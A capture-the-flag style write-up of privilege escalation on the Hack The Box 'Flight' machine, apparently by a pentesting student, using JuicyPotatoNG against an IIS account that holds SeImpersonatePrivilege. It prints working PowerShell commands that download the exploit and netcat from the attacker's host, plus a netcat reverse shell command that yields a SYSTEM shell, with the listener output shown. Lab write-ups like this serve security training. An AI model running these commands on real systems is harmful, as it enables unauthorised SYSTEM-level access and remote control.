JuicyPotatoNG
The compromised iis-default account has both SeAssignPrimaryTokenPrivilege and SeImpersonatePrivilege set.
this makes the target system vulnerable to the potato exploits
I would usually use JuicyPotato for token impersonation, but it does not work on anything above Windows 10 1809 & Windows Server 2019
The target system is Windows Server 2019, so I would need something else.
There is a newer version of JuicyPotato called JuicyPotatoNG that works
- is newest version of Potato exploits
- uses a spoofing technique to bypass the windows firewall restriction (if enabled)
- is able to exploit LOCALLY
- more info can be found here
exploit
The binary can be downloaded from the official GitHub repo
Exploitation
ps c:\tmp> iwr -Uri http://10.10.16.8/potato/JuicyPotatoNG.exe -Outfile C:\tmp\JuicyPotatoNG.exe
ps c:\tmp> iwr -Uri http://10.10.16.8/potato/nc64.exe -Outfile C:\tmp\nc64.exeDelivery complete Netcat will be used for a reverse shell payload for code execution
ps c:\tmp> .\JuicyPotatoNG.exe -t * -p C:\tmp\nc64.exe -a "10.10.16.8 1235 -e cmd"Executing
┌──(kali㉿kali)-[~/archive/htb/labs/flight]
└─$ nnc 1235
listening on [any] 1235 ...
connect to [10.10.16.8] from (UNKNOWN) [10.10.11.187] 54300
Microsoft Windows [Version 10.0.17763.2989]
(c) 2018 Microsoft Corporation. All rights reserved.
c:\> whoami
whoami
nt authority\system
c:\> hostname
hostname
g0
c:\> ipconfig
ipconfig
Windows IP Configuration
ethernet adapter ethernet0 2:
connection-specific dns suffix . : htb
ipv6 address. . . . . . . . . . . : dead:beef::23d
ipv6 address. . . . . . . . . . . : dead:beef::b1d9:efc7:61e1:4d02
link-local ipv6 address . . . . . : fe80::b1d9:efc7:61e1:4d02%6
ipv4 address. . . . . . . . . . . : 10.10.11.187
subnet mask . . . . . . . . . . . : 255.255.254.0
default gateway . . . . . . . . . : fe80::250:56ff:feb9:d784%6
10.10.10.2System Level Compromise